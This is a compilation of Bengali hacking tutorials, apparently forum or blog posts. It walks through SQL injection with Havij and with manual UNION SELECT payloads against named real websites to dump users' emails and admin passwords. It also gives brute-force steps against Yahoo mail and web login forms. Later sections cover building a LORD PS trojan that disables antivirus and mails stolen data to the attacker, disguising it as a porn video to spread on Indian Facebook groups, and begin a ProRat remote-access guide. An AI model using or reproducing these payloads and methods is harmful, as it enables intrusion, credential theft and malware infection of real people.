একাধিক ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করুন অন্যরকম একটি পদ্ধতিতে

কেমন আছেন সবাই। আশা করি ভাল।

আজ আপনাদের সাথে অন্যরকম একটি পদ্ধতিতে ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করা বিষয়ে আলোচনা করব।

এর মাধ্যমে আপনি একাধিক ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করতে পারবেন।

তবে সবার প্রতি অনুরোধ কারো ক্ষতি করবেন না এটি দিয়ে। শুধু শেখার জন্য আমার এই টিউটোরিয়াল।

আজকে আপনাদের সাথে একটি পদ্ধতি শেয়ার করব । যেটা দিয়ে আপনারা ইমেইল এবং ফেসবুক পার্সওয়ার্ড হ্যাক করতে পারবেন। অনেকে জিঙ্গাসা করেছিল টিপস্ টা বলতে। তাই এখানে পোষ্ট টা করে দিলাম । যাক এখন সরাসরি টিউটোরিয়াল এ চলে যাব। এই পদ্ধতিটি আমরা HAVIJ দিয়ে করব । বিষয়টি যারা জানেন তাদের জন্য সহজ হবে।

HAVIJ    ডাউনলোড করুন এখানে

www.ziddu.com/download/20925593/Havij1.5fulltill2099_Hemaloy.rar.html

১. এরপর প্রথমে আপনি HAVIJ ওপেন করুন। আপনার এখন vlunerable একটি ওয়েবসাইট লাগবে যেখানে ইমেইল দিয়ে রেজিষ্টার করতে হয়। আমরা একটা সাইট নিলাম www.singhaniauniversity.co.in/newsDetails.php?ID=46 এটা HAVIJ দিয়ে এ্যানালাইজ দেন।




২. এখন আপনি Tables থেকে website_database বক্স্ টি সিলেক্ট করে Get Tables ট্যাব বাটনে ক্লিক করুন। সেখানে আপনাকে অনেকগুলো Table দেখানো হবে।
৩.এখান থেকে এবার আপনাকে users বক্স টি খুজে সিলেক্ট করতে হবে। (একটা কথা>>> আপনি অন্যান্য সাইটে member/regester ইত্যাদি ট্যাবল গুলায় আইডি গুলো পেতে পারেন ) user ট্যাবল সিলেক্ট করে এবার Get Columns ট্যাব এ ক্লিক করুন।
৪. এরপর আপনি vUserID, vPassword, vUserName , vEmailAddress, vAccountType ………. বক্স পাবেন। এবার এখান থেকে আপনি শুধু  vEmailAddress এবং vPassword বক্স সিলেক্ট করে Get Data ট্যাব এ ক্লিক করুন।
৫. এরপর আপনি্ন একটি একটি করে সাইটে রেজিষ্টার হওয়া সকল ইমেইল এবং পার্সওয়ার্ড পাবেন। ডান পাশে Save Data নামের একটি ট্যাব আছে। সবগুলো আইডি এবং পার্সওয়ার্ড পাওয়ার পর সেখানে ক্লিক করলে আপনি ইমেইল এবং পার্সওয়ার্ড গুলো ফরম্যাটে ফাইলে সেভ করতে পারবেন।
৬. এখন আপনি আপনার সেভ করা html ফাইলটা ওপেন করুন। এবং এক এক করে আপনার টার্গেট গুলা চেক করুন। আশা করি ব্যপার টা আপ্নারা সবাই বুঝতে পেরেছেন।
কোন রকম অপেক্ষা ছাড়া এভাবে আপনি লাইভ আইডি হ্যাক করতে পারবেন।

সবাই ভালো থাকবেন।

hat is SQL and how to hack a website [ part-2]

 

SQL Inj3cti0n কি ?

সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।

যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?

না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।

কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?

যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।

কিভাবে SQL inj3ction করবো কোনো সাইটকে ?

প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।

সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-

আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।

http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।

Vulnerable কলাম বের করার নিয়ম :-

এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--

ডাটাবেজ ভার্শন বের করার নিয়ম:-

যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।

ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।

এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--

তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--

বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার

ব্রুট ফোর্স এ্যাটাক : বিস্তারিত [অধ্যায়-১৪]

ব্রুট ফোর্সের মাধ্যমে কিভাবে ইমেইল আইডি, ওয়েবসাইট ইউজার পাসওয়ার্ড, ওয়েব ফর্ম হ্যাক করতে হয় আজ আমি আপনাদের সাথে শেয়ার করব। যদিও এই পদ্ধতিটি একটি অতীব ধীর পদ্ধতি তথাপি হ্যাকিং সমাজে এটা সমাদৃত। কারন অনেক হ্যাকিং শুধুমাত্র এই পদ্ধতিতেই করা হয়। তবে এর মাধ্যমে আপনারা খুব বেশি উপকৃত হতে পারবেন না। পোষ্টটি দিয়েছি শুধুমাত্র আপনাদের জানানোর জন্য।

পদ্ধতি : ১

১। প্রথমেই এখান থেকে ব্রুট ফোর্স সফটওয়্যারটি ডাউনলোড করে নিন।
২। ডেস্কটপে এক্সট্রাক্ট করুন।
৩। ইমেইল এড্রেস হ্যাক করার জন্য টার্গেট বারে লিখুন pop.mail.yahoo.com
৪। টাইপ নির্ধারন করুন POP3
৫। কানেকশান ৬০ এবং টাইমআউট ৬০ নিবার্চন করুন।
৬। Single User এ ক্লিক করুন।
৭। পাসওয়ার্ড মুড ব্রুট ফোর্স নিবার্চন করুন।
৮। Range এ ক্লিক করুন। একটি নতুন উইন্ডো খুলবে।
৯। সেকানে Min Length ৬ এবং Max Length ১৬ দিন।
১০। এবার Custom Range এ ক্লিক করে ওকে করুন।

এটা আসলে পাসওয়ার্ড ক্রাক করে। তবে অনেক সময় প্রয়োজন। ক্রাকার মূলত যেভাবে কাজ করে এটাও ঠিক তাই। মুভিতে আপনারা দেখে থাকবেন কিভাবে কোন ব্যাংক বা অন্য কোন সিকিউর মাধ্যমের পাসওয়ার্ড ভেঙ্গে ফেলে। আসলে প্রক্রিয়াটি হচ্ছে এটি সবধরনের পাসওয়ার্ড নির্দিষ্ট লাইন অনুযায়ী সাজিয়ে দেখে কোনটা মাধ্যমের জন্য গ্রহনযোগ্য। তবে যদি পাসওয়ার্ড সংখ্যা ও অক্ষরের সমন্বয়ে গঠিত হয় তাহলে সেখানে ব্রুস এ্যাটাক চালিয়ে কোন কাজ হবে না।

পদ্ধতি : ২

১। প্রথমেই ব্রুট ফোর্স ডাউনলোড করে নিন।
২। ডেস্কটপে এক্সট্রাক্ট করুন।
৩। আপনার আইপি হাইড করে নিন।
৪। এখানে থেকে পাসওয়ার্ডের বিশাল সংগ্রহ ডাউনলোড করে নিন।

শুরু করা যাক –

আমরা সাধারনত কোন ওয়েবসাইটে কাজ করার জন্য লগইন করেন। এখন আপনি যদি কোন সাইটের একাউন্ট হ্যাক করতে চান তাহলে সবর্প্রথম ওই সাইটে কয়েকবার লগইন করুন। হোক সেটা ভুল। আমরা এ কাজটি করব একটি কারনে আর সেটি হল দেখার জন্য যে ওই সাইটে লগইনের কোন লিমিট নেই। যদি আমরা সাফল্যের সহিত ব্যাপারটি ভেরিফাইড করি তাহলে আমরা এতে ব্রুট ফোর্স চালাতে পারব।

ব্রুট ফোর্স ওপেন করুন। টার্গেটে কোন পরিবর্তন না এনে টাইপে HTTP (Form) নিবার্চন করুন। কিছুক্ষন অপেক্ষার পর দেখতে পাবেন সেখানে নতুন একটি অপশন এসেছে। যার নাম Modify Sequence এতে ক্লিক করুন। এবার আপনাকে খুজতে হবে যেই পেজের লগইন ফর্ম হ্যাক করতে চান তার লিংক। যেমন : http://www.example.com/login

খুজে পেলে আপনি লিংকটা Modify Sequence এর Target Form এ বসিয়ে Learn Form Settings এ ক্লিক করুন। এখানে আপনি নিচের মত চিত্র দেখতে পাবেন।

এখানে আপনি Field Name এর নিচে দেখতে পাচ্ছেন পাসওয়ার্ড এবং ইউজার নেম। এখন আপনি Username বাটনে ক্লিক করে দেখুন কোথায় ব্রুট জেনারেটেড পাসওয়ার্ডগুলো রেখেছে। একই নিয়ম Password বাটনের ক্ষেত্রেও। Accept ক্লিক করার পর আপনি আগের পৃষ্ঠায় যেতে পারবেন। যখন আপনি কোন সাইটে লগইন করতে যাবেন যদি সেক্ষেত্রে incorrect login এই জাতিয় কোন মেসেজ দেখায় তাহলে সেটা কপি করে Modify Sequence এর HTML Response বক্সে বসিয়ে দিন। তারপর ওকে দিয়ে বেরিয়ে আসুন।

সবশেষে Wordlist সেট করব আমরা। সেক্ষেত্রে Pass mode এর নীচে Pass file এ ব্রাউজ করে ব্রুট জেনারেটেড পাসওয়ার্ড ফাইলটি দেখিয়ে দিন। এবার স্টার্ট বাটনে ক্লিক করুন। পদ্ধতিটি অনেক্ষন ধরে চলতে দিন। তবে প্রথমেই দেখবেন আপনার আইপি হাইড করেছেন কিনা।

^3xtreme Hacking Tune^

১ম অধ্যায়ঃ   
হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু।



আমি “Lord ps” এই সফটওয়্যার দিয়ে কিভাবে হ্যাক করতে হয় তা শিখাব। LORD PS সফটওয়্যার টা ডাউনলোড করার জন্য http://www.mediafire.com/?nj4l5dngq52d5sg ক্লিক করুন আপনারা গুগলে সার্চ করে নতুন ভার্সন গুলো ডাউনলোড করে নিতে পারে। নতুন ভার্সন গুলো আরও অনেক উন্নত।

যাদের winzip/rar নাই তারা  নেট থেকে ডাউনলোড করে নিতে পারেন।  সফটওয়্যার অনেক ছোট কিন্তু কাজ করে অনেক বড়।এটা এমন কাজ করতে পারে যা victim এর পিসির সব কিছু change এবং অনেক গুরুত্তপূর্ণ তথ্য চুরি করতে  পারে। এক কথায় সব উলট পালট করে দিতে পারে। এখন দেখুন কিভাবে করবেন???প্রথম নিচের লেখা গুলো ফোলও করেন। তারপর দেখেন কিভাবে victim কে attack করবেন ।

ডাউনলোড করার পর সফট টা ওপেন করলে নিচের ছবিত মত দেখাবে।

mir alamin1 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

এখন (১) SEND INFORMATIOL এ থেকে আপনি সব গুলো ঘর এ টিক দিতে পারেন। এটা হল আপনি victim এর কি কি তথ্য নিতে চান।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 06 23 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

এখন (২) DISABLE WINDOWS TOOLS এখানে অনেক গুলো অপশন আছে। এগুলো থেকে আপনি যা যা disable করে দিতে চান সে ঘর গুলোতে টিক দিন। অর্থাৎ আপনি যেগুলো যেগুলো টিক দিবেন ওগুলো victim এর পিসি তে disable হয়ে যাবে।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 09 03 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৩) এখন পরের অপশন থেকে ( Internet Browser) যা যা ডিলিট এবং disable করতে চান যেগুলো তে টিক দিন।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 09 33 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৪)তারপর FUN অপশন থেকে {(Hide Shutdown. Hide Logoff, Reset Time In Clock(সময় পরিবর্তন), Lock All Drive(হার্ডডিস্ক লক করে দিন। হার্ডডিস্ক আর খুলতে পারবে না )  ইত্যাদি। আপনি আপনার ইচ্চা মত আড়োও মার্ক করতে পারেন।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 09 50 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৫)”Disable Antivirus & virus software” অপশন থেকে সব গুলো ঘরে টিক মারেন। তাহলে victim আর পিসির সব ভাইরাস সফটওয়্যার বন্ধ হয়ে যাবে। তাহলে এই ট্রোজান টা ভাল ভাবে কাজ করতে পারবে।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 10 37 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৬) তারপর নিচের অপশন ( Yahoo Messenger Tools) থেমে প্রথম অপশন অর্থাৎ Not Active AutoLogin এ টিক দিন.।

mir+alamin.JPG JPEG Image 645x607 pixels 2012 03 07 20 10 57 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৭) তারপর Enable Fake Error এ টিক দিন আর title এ লিখুন you are hacked, আর message এর কিছু পরিবর্তন করতে হবে না। victim কোন কাজ করার সময় এই মেসেজ দেখাবে। আর Email Option এ আপনার email address লেখেন। এখানে ইমেইল অ্যাড্রেস লিখলে victim এর সব তথ্য আপনার মেইল অ্যাড্রেস এ চলে আসবে। তার জন্য আপনি নিউ একটা মেইল অ্যাকাউন্ট খুলে নিতে পারেন। তারপর Run Program থেকে calc.exe সিলেক্ট করেন।

mir alamin 11 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^



(৮)এখন “Show This Message After Reboot In Welcome Page” আর title এ লেখেন  XXXXXX  এবং message এ লেখেন i will F**k you S00n..I dont g!ve up any lamer-go to he11.

অথবা আপনি আপনার ইচ্চা মত লেখা লেখতে পারেন। এই লেখা গুলো হল victim পিসি Restart দিলে পিসি ওপেন করলে এই লেখা গুলো Show করবে। তারপর “Change Title Of Internet Explorer” আর  title এ লেখেন “you are hacked by BD xxxxx” অথবা আপনার যা ইচ্চা লেখেন। যাতে ইন্ডিয়াদের মান সম্মান সব ধুলায় মিশে যায়।

mir+alamin+1.JPG JPEG Image 725x646 pixels 2012 03 07 22 15 01 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

(৯) এখন সব করা শেষ। এখন Create LPS এ ক্লিক করন। তারপর যেকোনো জায়গায় সেভ করুন।

mir+alamin+1.JPG JPEG Image 725x646 pixels 2012 03 07 22 22 27 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

যাক বাবা বাছা গেল ছবি upload করা থেকে!!!! এখন আসুন কি ভাবে victim কে attack করবেন??? এখন আপনি ফাইল টি সেভ করে যেখানে রেখেছেন সেই ফোল্ডার এ যান। তারপর TOOLS থেকে Folder Option এ যান।

Mir Alamin 21 1024x718 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

এই উইন্ডোজ ৭ আর থেম কার লাগবে??? হাত তলুন???

Mir Alamin 4 হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

এখন দেখা যাবে ফাইল এর টাইপ/extension কি রকম দেখা যাবে( may be .exe হতে পারে।?) । এখন আপনারা ওই ফাইল তার  নাম পরিবরতম করতে পারেন। যেমন my first xxx time video.3gp । তারপর এই ফাইল টি compress করে ZIP/RAR ফাইল এ অ্যাড করেন।

Capseture হ্যাক করুন অ্যাকাউন্ট , পাসওয়ার্ড , পিসি এবং উলট পালট করে দিন সব কিছু। ^3xtreme Hacking Tune^

তারপর এটি mediafire এ upload করেন। তারপর ইন্দিয়ার যেকোনো ফেসবুক গ্রুপ, পেজ, ওয়েবসাইট এবং পর্ণ সাইট গুলো তে কমেন্ট করে করে এই ফাইল টি শেয়ার করেন। আর সবাই চাইবে যে এই ভিডিও টা দেখার জন্য। কিন্তু ভিডিও টা-তে ক্লিক করলেই কাজ শুরু হয়ে যাবে। ও শেষ!!!!! একটি টিপসঃ যখন ওই ফাইল টি compress করবেন তখন compress  ফাইল আর ভিতরে  একটা গানের ভিডিও দিয়ে দিতে পারেন! তাহলে victim বুজবেনা । আর ভাইরাস ফাইল টার সাইজও অনেক কম প্রায় ২০, ৩০ কেবি। তাই compress file আর ভিতরে  একটা video দিয়ে দিবেন!!!।  । মটামটি কম্প্রেসস ফাইল টার সাইজ ৫ থেকে ১০ এমবি করার চেষ্টা করবেন।   কাজের কথাই বলতে ভুলে গেছি……? আপনি কিভাবে সব তথ্য পাবেন?? কোন victim যদি আপনার বানানো (PS) ফাইল টা-তে ক্লিক করে তাহলে এই PS ভিকটিম আর পিসি তে ১ শাপ্তাহ ঘোড়া ঘুরি করে আপনাকে মেইল করে সব কিছু জানিয়ে দিবে। so, শুরু হয়ে জাক… । কেউ যদি attack হয় তাহলে আমি দাই নয়। দাই হবে আমার সাথের শয়তান!!!হাহাহ!!

[ বি দ্র ঃ আপনি ভুল করে আপনার বানানো ফাইল এ ক্লিক করবেন না। তাহলে আপনি নিজেই অ্যাটাক হয়ে যাবেন। ]


এখন চলুন একটা real হ্যাকিং শিখাই আপনাদের জন্য। যা দ্বারা আপনারা সাথে সাথে জেকোন অ্যাকাউন্ট হ্যাক করতে পারবেন…আর বুক ফুলিয়ে আপনার বন্ধুকে বলতে পারবেন আপনি অ্যাকাউন্ট হ্যাক করেছি…

কি অবাক হচ্ছেন??? অবাক হওয়ার ই কথা। অনেক আনন্দ লাগছে ত??? অপেক্ষা করুন… বলছি কিভাবে হ্যাক করবেন। ……………………………………………

কি সহ্য হচ্ছে না??

থাক বলে ফেলি কিভাবে হ্যাক করবেন। আপনি ফেসবুক অথবা যেকোনো একটা সাইট এ নতুন একটা অ্যাকাউন্ট খুলন। তারপর আপনি আপনার বন্ধুদের সাথে শেয়ার করুন ওই অ্যাকাউন্ট এর ইউজার নেম অ্যান্ড পাসওয়ার্ড। আর বলুন যে  এই অ্যাকাউন্ট টা আপনি হ্যাক করেছেন।।হাহাহহা কি মজা………… ফান করলাম। মাইন্ড কইরেন না। lolz!!!



আমার নেক্সট টিউন কি হবে যা জেনে নেন

১। ইমেইল অ্যাড্রেস হ্যাকিং ( ফিশিং না)

২। wordpress ব্লগ হ্যাকিং।  ( কি অবাক হচ্ছেন নাকি??? অবাক হওয়ার কিছু নাই। সত্যি সত্যি শিখাব কিভাবে হ্যাক করতে হয়।)
আপনারা সবাই কমেন্ট করলে আমার এই টিউন টি সার্থক হবে। please কমেন্ট করবেন। কমেন্ট না করলে আর কোন টিউন করবো না ।কমেন্ট না করলে মন খারাপ হয়ে যায়

    প্রথম   পর্ব।    “LORD PS”
    দ্বিতীয় পর্ব।    “ProRat v1.9 “
    তৃতীয়  পর্ব।   “Maya Password Stealer”
    পঞ্চম   পর্ব।    “l337 virus creator(Right Hand Man’s)”
    চতুর্থ   পর্ব।    “Beast”
    ষষ্ঠ পর্ব।        “FUC**R PS”




২য় অধ্যায়ঃ
   
পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part-2]
লিখেছেন, Tj MiR বিভাগ, হ্যাকিং, হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং তারিখ, ১২ মার্চ ২০১২ ৭০ টি মন্তব্যFavoriteপ্রিয় টিউন প্রতি ক্লিকে নতুন কিছু যাদুর বাক্সে

0
0
1
0

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের টিউন টা করে অনেক উৎসাহ পাইছি । তাই  আজকে আবার আর একটা মারাত্মক ট্রোজান ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি কন্ট্রোল করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা যায়। কিছু দিন আগেও  আমাদের ধারনা ছিল হ্যাকিং জিনিস টা অনেক খারাপ । কিন্তু এখন বাংলাদেশ এবং ইন্ডিয়ার মধ্যে হ্যাকিং যুদ্ধ দেখে সবাই চায় হ্যাকিং শিখতে। আসলে হ্যাকিং শিখার তেমন কিছু নাই। হ্যাকিং করতে হয় নিজের বুদ্ধি থেকে। প্রত্যেকটা জিনিশেরই একটা ভাল এবং খারাপ দিক আছে। আমরা স্বভাবতই ভাল জিনিসটা জানবো এবং তার সাথে খারাপ দিকটা জানা ভাল , কারন ওই জিনিশের খারাপ দিকটা জানতে হবে আমাদের নিরাপত্তার জন্য। একটা উদাহরন দিয়ে বলি, আগে থেকেই হ্যাকিং এর উপর আমার খুব আগ্রহ। প্রথম পিশিং আর কথা শুনি । আগে আমি পিশিং সম্পর্কে কিছুই জানতাম না।  এখন জানি এবং পিশিং  করতে পারি। তাই পূর্বের থেকে বর্তমানে আমার অ্যাকাউন্ট নিরাপত্তা অনেক বেশি । তাই আমি যদি হ্যাকিং সম্পর্কে কিছুই না জানি তবে নিজেকে কিভাবে রক্ষা করবো? ঠিক এই কারনেই আমাদের দেশি ওয়েবসাইট গুলো প্রতিনিয়ত বিদেশি হ্যাকার দ্বারা আক্রান্ত হয়। আমাদের দুংখ যে আমাদের দেশে কিছু ভাল হ্যাঁকার আছে কিন্তু সংখায় অনেক কম । ইউরোপ আমেরিকায় লক্ষ লক্ষ taka বেতন দিয়ে বিভিন্ন কোম্পানী হ্যাকার রাখে তাদের কোম্পানীর নিরাপত্তার জন্য। তাই আমি মনে করি আমাদের দেশের প্রত্যেকটা ইন্টারনেট ব্যবহারকারীর হ্যাকিং সম্পর্কে নুন্যতম ধারনা  থাকা উচিত। তবে হ্যাকিং আর রাখাপ দিক তা থেকে আমাদের বিরত থাকতে হবে । কারো ক্ষতি করার জন্য হ্যাকিং কাজে লাগানো যাবেনা। তবে নিজের দেশের জন্য হ্যাকিং এর খারাপ দিকটা কাজে লাগাতে হবে।  যাই হোক হ্যাকিং বিষয়ে ফিরে আসি।  আসলে যদি ঠিক ঠাক বুঝা যায় তবে হ্যাকিং জিনিসটা অত্যান্ত মজার এবং নেশার মত, একটু জানলে আরো জানতে ইচ্ছা করে। এইটা টিউন পড়লে হ্যাকিং নিয়ে আর একটা টিউন পরতে ইচ্ছা করে। অনেক কথা বলে ফেললাম । এখন  শুরু করা যাক।

পর্ব ১এর টিউন টি পড়ার জন্য এখানে ক্লিক করুন। 

“দয়া করে কারো ক্ষতির উদ্দেশ্যে ব্যবহার করবেন না”

ProRat v1.9 একটি অত্যান্ত শক্তিশালী প্রোফেশনাল হ্যাকিং সফটওয়্যার। এটি দ্বারা খুব সহজেই অন্যের পিসির নিয়ন্ত্রন করা এবং তার পিসির সমস্ত নিরাপত্তা ব্যাবস্থা ভেঙ্গে দেওয়া এমনকি তার পিসির সকল ড্রাইভ ফরমেট করা এবং সব পাসওয়ার্ড চুরি করা, আপনার ইচ্ছা মত অন্য পিসি লগ অফ করা, restart করা, ও পিসি তে কি করছে তা জানা ইত্যাদি ইত্যাদি করা সম্ভব এবং আপনি তা করতে পারবেন আপনার পিসি থেকে। কি আবাক লাগছে!!!!? কিন্তু এইটা সত্য। আর কি কি করতে পারবেন তাও বলব।
এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন।

এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

এখন  ডাউনলোড করে নিন “Pro Rat” সফটওয়্যারটি।   এখানে ক্লিক করুন।  অথবা http://www.prorat.net/downloads.php

ডাইনলোড কৃত ফাইলটি Extract করুন। পেয়ে যাবেন মুল সফটওয়্যার। এই সফটওয়্যারটি নিয়ে একটু সাবধানে কাজ করতে হবে, কারন কিছু না জেনে কাজ করলে আপনার নিজের পিসিরই ক্ষতি হয়ে যেতে পারে। আমার আগের টিউন পরে কয়েক জন নিজের ক্ষতি নিজে করেছে। তাই সাবধানে কাজ করতে হবে।

এটি দিয়ে অন্যের পিসি হ্যাক করা হয় একটি ট্রোজান ভাইরাস সৃস্টির মাধ্যমে। এই সফটওয়্যার টি দিয়ে ভাইরাস বানিয়ে  যেকোনো মুল্য victim আর পিসিতে রান করাতে হবে । প্রথমে ProRat.exe ফাইলটি চালু করুন।

